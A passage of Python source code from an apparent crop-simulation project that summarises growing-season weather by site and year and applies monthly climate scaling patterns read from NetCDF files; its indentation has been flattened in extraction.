tempvar_all = [np.nan]*siteyears_filtered.shape[0]
rh_all = [np.nan]*siteyears_filtered.shape[0]
rhvar_all = [np.nan]*siteyears_filtered.shape[0]
precip_all = [np.nan]*siteyears_filtered.shape[0]
precipvar_all = [np.nan]*siteyears_filtered.shape[0]
solrad_all = [np.nan]*siteyears_filtered.shape[0]
solradvar_all = [np.nan]*siteyears_filtered.shape[0]
for item in np.arange(siteyears_filtered.shape[0]):
# year & site
year = siteyears_filtered.iloc[item]['year']
site = siteyears_filtered.iloc[item]['site']
# Temperature
df = df_temp
temp = list(df[
(df.index.year == int(year)) &
(gseason_start <= df.index.month) &
(df.index.month < gseason_end)][site].interpolate(axis=0))
temp_mean = round(np.nanmean(temp), 2)
temp_var = np.nanvar(temp)/temp_mean
temp_all[item] = temp_mean
tempvar_all[item] = temp_var
# RH
df = df_rh
rh = list(df[
(df.index.year == int(year)) &
(gseason_start <= df.index.month) &
(df.index.month < gseason_end)][site].interpolate(axis=0))
rh_mean = round(np.nanmean(rh), 2)
rh_var = np.nanvar(rh)/rh_mean
rh_all[item] = rh_mean
rhvar_all[item] = rh_var
# Precip
df = df_precip
precip = list(df[
(df.index.year == int(year)) &
(gseason_start <= df.index.month) &
(df.index.month < gseason_end)][site].interpolate(axis=0))
precip_mean = round(sum(precip), 2)
precip_var = np.nanvar(precip)/precip_mean
precip_all[item] = precip_mean
precipvar_all[item] = precip_var
# Solrad
df = df_solrad
solrad = list(df[
(df.index.year == int(year)) &
(gseason_start <= df.index.month) &
(df.index.month < gseason_end)][site].interpolate(axis=0))
solrad_mean = round(np.nanmean(solrad), 2)
solrad_var = np.nanvar(solrad)/solrad_mean
solrad_all[item] = solrad_mean
solradvar_all[item] = solrad_var
# Calculate VPD based on temperature & RH
vpd_all = [
round(CC_VPD(temp, rh/100), 2) for temp, rh in zip(temp_all, rh_all)]
# Compile summarized growing season met info into dataframe
df_wea_all = pd.DataFrame({'temp': temp_all,
'temp_var': tempvar_all,
'rh': rh_all,
'rh_var': rhvar_all,
'vpd': vpd_all,
'precip': precip_all,
'precip_var': precipvar_all,
'solrad': solrad_all,
'solrad_var': solradvar_all})
df_siteyears = siteyears_filtered.reset_index(drop=True)
df_wea_summary = df_siteyears.join(df_wea_all)
return(df_wea_summary)
def get_scale_ratio(run_name, climate_factor, month):
"""
Determine temperature scaling pattern for future climate.
Parameters
----------
run_name : str
Simulation run name.
climate_factor : str
- 'T'
- 'RH'
month : int
Month of data (0 - Jan, 11 - Dec)
Returns
-------
temp_scale : list
List of scaling ratios for temp projection.
"""
dirct_yaml = os.path.join(DATA_PATH, 'files', f'filepaths_{run_name}.yml')
dirct_temp_scaling = os.path.join(
os.path.expanduser('~'),
'data',
f'{climate_factor}_scalepattern',
f'{climate_factor}_scaling_mon{month}.nc')
df_sims, df_sites, df_wea, df_params, df_all, df_matured = read_data(
dirct_yaml)
ds = xr.open_dataset(dirct_temp_scaling)
# lat/lon for sim sites
site_lats = df_sites.lat
# convert lon from -180/180 into 0/360
site_lons = [round(lon % 360, 2) for lon in df_sites.lon]
# lat/lon for temp scaling pattern
lats = ds.lat.values
lons = ds.lon.values
lats_index = []
lons_index = []
# Determine closest temp pattern lat/lon index
for site_lat, site_lon in zip(site_lats, site_lons):
# latitude
min_lat_diff = min([abs(lat - site_lat) for lat in lats])
nearest_lat_index = [
abs(lat - site_lat) for lat in lats].index(min_lat_diff)
lats_index.append(nearest_lat_index)
# longitude
min_lon_diff = min([abs(lon - site_lon) for lon in lons])
nearest_lon_index = [
abs(lon - site_lon) for lon in lons].index(min_lon_diff)
lons_index.append(nearest_lon_index)
# Filter out temperature scaling ratio
temp_scales = []
for lat_index, lon_index in zip(lats_index, lons_index):
temp_scale = ds.ratio.isel(lat=lat_index).isel(lon=lon_index).item()
temp_scales.append(temp_scale)
return(temp_scales)
def scale_climate(site_lat, site_lon, months, climate_factor):
"""
Scale climate factor in weather data file.
Based on climate factor projected pattern determined
throuhg get_scale_ratio.
Parameters
----------
temp_anomaly : float
Multi-model mean of projected global temperature change.
site_lat : float
Latitude of selected location.
site_lon : float
Longitude of selected location.
months : list
List of ints, month of data (1 - Jan, 12 - Dec).
climate_factor : str
- 'T'
- 'RH'
"""
# Read in scaling data for each month
months_in_year = np.arange(12)
dss = [np.nan]*len(months_in_year)
for item, month_in_year in enumerate(months_in_year):
dirct_climate_scaling = os.path.join(
os.path.expanduser('~'),
'data',
f'{climate_factor}_scalepattern',
f'{climate_factor}_scaling_mon{month_in_year}.nc')
ds = xr.open_dataset(dirct_climate_scaling)
dss[item] = ds
# Fetch scales for all months
scale_each_month = []
for item in months_in_year:
# dataset for specific month
ds = dss[item]
# lat/lon for temp scaling pattern
lats = ds.lat.values
lons = ds.lon.values
# convert site lon from -180/180 into 0/360
site_lon = round(site_lon % 360, 2)
# Determine closest temp pattern lat/lon index
# latitude
min_lat_diff = min([abs(lat - site_lat) for lat in lats])
nearest_lat_index = [
abs(lat - site_lat) for lat in lats].index(min_lat_diff)
# longitude
min_lon_diff = min([abs(lon - site_lon) for lon in lons])
nearest_lon_index = [
abs(lon - site_lon) for lon in lons].index(min_lon_diff)
# Filter out temperature scaling ratio
climate_scale = ds.ratio.isel(
lat=nearest_lat_index).isel(lon=nearest_lon_index).item()
scale_each_month.append(climate_scale)
# Compile final scales
scales = [scale_each_month[month-1] for month in months]
return(scales)
```
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.